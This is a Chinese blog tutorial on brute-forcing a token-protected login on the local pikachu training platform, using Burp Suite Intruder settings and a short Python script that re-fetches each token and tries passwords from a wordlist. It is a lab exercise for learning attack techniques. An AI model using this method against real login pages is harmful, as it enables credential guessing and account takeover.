token绕过

现在的网页有很多验证机制,就是为了防止暴力破解,有直接在前端就可以进行修改的,有需要在服务器进行修改的,对于目前的我来说,如果在服务器修改就没办法绕过,但是大多时候利用burpsuite就可以进行中间代理修改。其中字典有很多,你可以在github找,也可以私信我

这里我就针对token绕过进行一次记录

我用的是pikachu漏洞测试平台

第一种:

直接利用burpsuite进行爆破,首先进行抓包,然后传到攻击面板

添加变量password和token,最上面的选择pitchfork

第二步就是设置线程,因为token是一对一的关系,当第二个token产生,第一个token就会消失,务必将线程调整至1,我使用的版本是刚出来的,所以线程不在options中 

记得将间隔时间调整至2000

第三步就是设置Grep=Extract 

 有一说一,这里我也听得模模糊糊,讲不出个所以然,你们将Grep=Extract下面的打个勾,然后add添加,然后点一下中间右边的response就会出现html,然后选择出value的值,然后再在下面填写token,最后ok就行了,就这样

最后一步就是设置302跳转,直接always,还有添加字典别忘了 

攻击就行了 

第二种:直接利用python脚本

我的python脚本代码是某一老师编写的,并不是我本人写的

#coding:utf-8
import requests
import re

url = "http://127.0.0.1/pikachu-master/vul/burteforce/bf_token.php"

def login(password):
    session = requests.session()
    req=session.get(url)
    user_token=re.search("[a-z0-9]{32}",req.text).group(0) #32md5
    data={"username":"admin","password":password,"Login":"Login",'user_token':user_token}
    req=session.post(url=url,data=data,allow_redirects=True)
    html = req.text
    return html

with open('top1000.txt') as p:
    passlist =p.readlines()
    p.close()

for line in passlist:
    line = line.strip("\n")
    print(line)
    if 'login success' in login(line):
        print( "[* 密码 is %s *]" % line )
        break

可能因为正则没怎么写好,导致带进去会报错,不过能攻击成功,如果有大佬能帮忙把正则补全,在下感激不尽

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/7422.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【AI JUST AI】自然语言交互式学习,ChatGPT成了我的最佳博客写作助手

【AI JUST AI】自然语言交互式学习,ChatGPT成了我的最佳博客写作助手 什么是自然语言交互式学习?ChatGPT是如何成为我的最佳博客写作助手的?**把与Chat GPT的每一次对话都当作一种类型的非系统学习**有问必答,随时交互 总结后记—…

用ChatGPT写作,提示词的四个层次

这几个周末我好好的研究了一下如何通过提示词的优化,提高ChatGPT输出内容的质量。 关于如何用ChatGPT帮助我们写东西,我总结了以下的规律,希望能给你一些启发。 写作的步骤 写一篇文章,思路上一定是从抽象到具体一步一步深入的。…

【分享】那些免魔法的chatGPT,GPT最佳实践

ChatGPT 问世,犹如平地惊雷般,在技术圈中引起了广泛讨论。作为全球最大的开发者社区,GitHub 平台也在近期诞生了多个 ChatGPT 相关的开源项目,其数量之多,可谓是见所未见,闻所未闻。说是 ChatGPT 以其一己之…

ChatGPT最强对手!Claude,无需魔法,无需等待,直接可用!

最近ChatGPT的封号问题搞得大家人心惶惶,这不Claude的slack版本来了。 使用Claude的slack版本,无需翻墙,无需加入Waitlist,无需付费,无需下载任何东西,没有高峰限制,而且效果媲美ChatGPT&#x…

如何使用 ChatGPT 进行数据库管理

管理数据库可能是一件大惊小怪的事情,但在 OpenAI 开发的强大语言生成模型 ChatGPT 的帮助下,它变得更易于管理。ChatGPT 可以针对与特定数据库相关的特定命令数据集进行微调,使其能够生成可以对该数据库执行各种操作的命令。 对模型进行微调…

chatgpt赋能python:Python包安装教程

Python包安装教程 Python是一门由Guido van Rossum于1989年创造的解释性高级编程语言。Python是一种优雅和简单的编程语言,有着广泛的应用。 在Python中,我们可以使用模块和包来组织我们的代码。本文包括Python包的安装教程,以及一些可能在安…

chatgpt赋能Python-python2_7_9安装教程

Python2.7.9安装教程 介绍 Python是一种面向对象、解释型、动态数据类型的高级程序设计语言。Python支持多种编程范式,如过程化、对象化、函数化等,拥有丰富的标准库和第三方库,是一种非常灵活且易于学习和使用的编程语言。Python2.7.9是Py…

chatgpt赋能python:Python模块安装方法全解析

Python模块安装方法全解析 Python是一种功能强大的编程语言,拥有大量的开源库,这些库是在各种应用程序中使用的重要组件,它们能加速开发过程。不管你是初学者、中级者还是高级者,总会遇到需要安装第三方库的情况。但是安装库是一…

chatgpt赋能Python-pythonpip怎么安装

Python PIP的详细安装教程 Python PIP是Python官方的包管理工具,可以帮助程序员简单轻松地下载和安装各种Python模块。下面我们来一步一步地介绍Python PIP的安装步骤。 1. 安装Python 首先,需要在您的计算机上安装Python。如果您还没有安装Python&am…

chatgpt赋能python:Python安装教程

Python 安装教程 您在编程学习、数据分析、机器学习等领域中,都会需要用到 Python。而在您开始使用之前,需要先将 Python 安装在您的设备上。在本篇文章中,将为大家介绍 Python 的安装教程,以及一些提示和注意事项。 系统要求和…

chatgpt赋能python:Python怎么安装?一篇简单易懂的教程

Python怎么安装?一篇简单易懂的教程 Python是一门深受科学家和开发者喜欢的编程语言,其简单易懂、易于上手的特点让其在众多编程语言中脱颖而出。在本文中,我们将会向大家介绍Python的安装过程。 Python的安装包 Python的官方网站提供了所…

chatgpt赋能Python-pythonpycharm详细安装教程

Python PyCharm详细安装教程 PyCharm是一个用于Python开发的集成开发环境(IDE),它具有强大的代码编辑功能和自动化工具,可以帮助开发人员更高效地编写Python代码。在本文中,我们将详细介绍如何安装PyCharm并进行基本的设置和配置。 准备工作…

GPT-4 System Card译文

摘要 大型语言模型(LLM)正被部署在我们生活的许多领域(从浏览到语音助手,再到编码辅助工具),具有巨大的社会潜力影响。此system card分析GPT系列中最新的LLM:GPT-4模型。首先,我们强…

ChatGPT:利用人工智能助推教育创新

当前,世界正需要一个更加开放的、更加个性化的学习空间,学生的个性发展和生存发展应该被关注和尊重,课程应该引导学生掌握有用的东西,学生之间的差距应该被正视,教育成功的标准也要被重新定义。过去,我们总…

留学生乱用ChatGPT真的太致命!被认定学术不诚信直接被退学?

01.ChatGPT留学生神器?作业论文全靠它? 近期留学圈内最火热的话题,肯定是关于ChatGPT。 “这个python作业我写不来,让ChatGPT帮我直接生成code就好了。” “论文英文的写不来,ChatGPT直接生成一篇essay,…

识别「ChatGPT造假」,效果超越OpenAI:北大、华为的AI生成检测器来了

本文来源 机器之心编辑部 AI 造假的成功率很高,前几天「10 分钟骗 430万」还上了热搜。在最热门的大语言模型上,研究人员最近探索了一种识别方法。 随着生成式大模型的不断进步,它们生成的语料正逐步逼近人类。虽然大模型正在解放无数文书的…

剽窃、作弊,ChatGPT竟偷偷生成了12篇署名论文!Marcus炮轰Ta变成CheatGPT

视学算法报道 编辑:David 昕朋 【导读】近日,ChatGPT成共同作者的事闹得沸沸扬扬,马库斯也来插一脚。面对使用ChatGPT剽窃论文、把它列为共同作者等现象,马库斯怒怼:别署它名! 马库斯又来怼ChatGPT了&…

ChatGPT transformer 5篇经典论文以及代码和解读

一次性读懂ChatGPT的技术演进路线,根据李沐老师推荐的5篇经典论文,整理了论文原文、论文解读、Github代码实现。 2017Transformer继MLP、CNN、RNN后的第四大类架构2018GPT使用 Transformer 解码器来做预训练2018BERTTransformer一统NLP的开始2019GPT-2更…

ChatGPT中的Token:了解聊天模型的基本单位

✍创作者:全栈弄潮儿 🏡 个人主页: 全栈弄潮儿的个人主页 🏙️ 个人社区,欢迎你的加入:全栈弄潮儿的个人社区 📙 专栏地址:AI大模型 ChatGPT中的Token是什么? 在ChatGPT…

本地搭建属于自己的ChatGPT:基于PyTorch+ChatGLM-6b+Streamlit+QDrant+DuckDuckGo

本地部署chatglm及缓解时效性问题的思路: 模型使用chatglm-6b 4bit,推理使用hugging face,前端应用使用streamlit或者gradio。 微调对显存要求较高,还没试验。可以结合LoRA进行微调。 缓解时效性问题:通过本地数据库…